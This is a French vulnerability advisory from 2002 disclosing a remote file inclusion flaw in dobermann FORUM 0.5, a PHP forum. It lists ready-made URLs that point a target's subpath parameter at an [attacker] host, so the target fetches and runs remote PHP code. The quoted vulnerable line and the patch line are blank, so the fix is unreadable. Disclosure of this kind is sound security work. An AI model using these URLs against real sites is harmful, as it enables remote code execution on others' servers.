dobermann FORUM *************** Informations : °°°°°°°°°°°°°° Langage : PHP Tested version : 0.5 Website : http://www.le-dobermann.com Problème : Inclusion de fichiers Developpement : °°°°°°°°°°°°°°° dobermann FORUM est un forum avec partie user, news,... Certains des fichiers sont touchés par une faille include(), permettant d'inclure des fichiers (et de les faire executer si c'est du code php) venant de l'exterieur. La ligne suivante : ------------------------------------------ ------------------------------------------ se trouve dans les trois fichiers : ------------------ entete.php enteteacceuil.php topic/entete.php ------------------ Or la variable $subpath n'est pas définie. On pourra donc inclure le fichier http://[attacker]/banniere.php avec les urls : http://[target]/entete.php?subpath=http://[attacker]/ ou http://[target]/enteteacceuil.php?subpath=http://[attacker]/ ou http://[target]/topic/entete.php?subpath=http://[attacker]/ Cette même faille est utilisable via d'autres fichiers. Dans index.php et newtopic.php, on peut voir les lignes : ------------------------ @require "config.php"; @include("entete.php"); ------------------------ Le code buggé d'entete.php se retrouve donc dans ces deux fichiers. $subpath n'étant pas définie dans ces fichiers ni dans config.php, on pourra aussi inclure toujours le même fichier sur [attacker] avec les urls : http://[target]/index.php?subpath=http://[attacker]/ ou http://[target]/newtopic.php?subpath=http://[attacker]/ Patch : °°°°°°° Dans les fichiers ------------------ entete.php enteteacceuil.php topic/entete.php ------------------ remplacer la ligne ------------------------------------------ ------------------------------------------ par ------------------------------------------ ------------------------------------------ Credits : °°°°°°°°° Auteur : frog-m@n E-mail : leseulfrog@hotmail.com Website : http://www.frog-man.org Date : 21/10/02